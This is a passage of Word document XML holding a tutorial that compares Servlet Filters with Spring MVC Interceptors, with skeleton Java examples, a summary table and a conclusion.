          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863CC8F" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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4. Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AB5CE6" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1910"/>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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Filters are configured in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or using @WebFilter annotation in modern web apps) and are generally applied at the Servlet level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541799F4" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1910"/>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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interceptors are configured in the Spring configuration class, often using HandlerInterceptor interface and WebMvcConfigurer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879FA89" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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5. Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D2BE3" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1911"/>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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Filters have access to the entire request-response lifecycle, and they can modify request/response objects at any point. Filters are typically used for low-level concerns such as request encoding, security, and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D9A6AA" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1911"/>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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interceptors work at the controller level and can modify the model, perform pre-processing before the controller method is called, and post-processing after the controller method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBA39E" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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6. Method Signature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120D8C3" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1912"/>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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Filters are implemented using the javax.servlet.Filter interface and override methods such as doFilter() which accepts ServletRequest and ServletResponse objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24288E21"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E140EF"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public class MyFilter implements Filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5684EC76"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44704A53"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public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E03BBA"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throws IOException, ServletException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6025CA"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 Perform pre-processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76967A57"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chain.doFilter(request, response); // Pass control to the next filter or servlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E05225"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 Perform post-processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BC16B5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBFD940"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE2844" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1912"/>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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interceptors are implemented using the HandlerInterceptor interface in Spring MVC and override methods such as preHandle(), postHandle(), and afterCompletion().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5BA580"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E8EF74"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public class MyInterceptor implements HandlerInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B36E159"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FF39D"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public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1B789"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throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464AD305"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 Perform pre-processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E2EE6"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return true; // true to continue request processing, false to stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9FD5A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306950B2" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53497ED3"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45934D67"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public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D3FB6"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ModelAndView modelAndView) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51F40B"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 Perform post-processing after controller method is called</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C3C6A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31767012" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B639E8"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D84B2E"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public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8EBA4"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Exception ex) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04DACD"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 Perform final cleanup after response is sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584ADDB6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2876E4"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65F89E" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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7. Order of Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFC5E6" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1913"/>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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Filters are executed in the order they are configured in the web.xml (or using annotations) before reaching the Spring DispatcherServlet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4357F61A" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1913"/>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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interceptors are executed in the order they are registered in the Spring application context, but they are specifically focused on the controller method execution and not the entire request lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20890C5A" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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8. Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ABA86B" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Filters are typically used for cross-cutting concerns like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868F4E7" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Request encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D880834" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF74E8" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Authentication and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34249CBB" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Session management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D9177" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E272C5" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Interceptors are typically used for concerns related to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> controller lifecycle like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1859E92E" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Pre-processing and post-processing model data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53359E" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Logging request and response data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CD92C" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Security checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64409B" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191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Modifying the request before it reaches the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F490F" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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Summary of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6"/>
        <w:gridCol w:w="3735"/>
        <w:gridCol w:w="4713"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="7776C91B" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E729A9F" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DA274E4" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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Filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C6B3255" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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Interceptor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="65BCBA2C" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="230E1608"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E70093F"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Part of Servlet API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B1F95A5"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Part of Spring MVC framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="365CF08C" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="143F2505"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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="557BEE08"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Request/Response lifecycle at the servlet level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E67921C"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Controller handling lifecycle in Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="0DE9D7A7" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2685036D"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Execution Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E13AE6"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Before reaching DispatcherServlet and after it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="769D5C46"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Before and after controller method execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="1B0EA19A" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F02DCA3"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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BD7312F"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Configured in web.xml or annotations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="598694FD"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Configured in Spring context or @Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="5691A0D3" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5A55CF"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Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739A96E6"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doFilter()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C9BF84F"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preHandle(), postHandle(), afterCompletion()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="024AABF3" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BD3AC59"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Common Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7287A92C"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Authentication, logging, session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5971EAD4"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Logging, request/response modification, security, validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="6F485D62" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B33018"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Lifecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4648BFA5"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orks on request/response level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FECECE1" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808"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orks on controller and model level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46337D4D" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405AC0D3" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1915"/>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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> work at a lower level, managing the entire request-response lifecycle and are often used for generic concerns like security and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A42DEC" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1915"/>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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are specific to </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, operating during the controller processing phase, and are primarily used for tasks like model manipulation, logging, and pre/post processing of controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7787A" w14:textId="182B3835" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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FF22967">
          <v:rect id="_x0000_i2122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
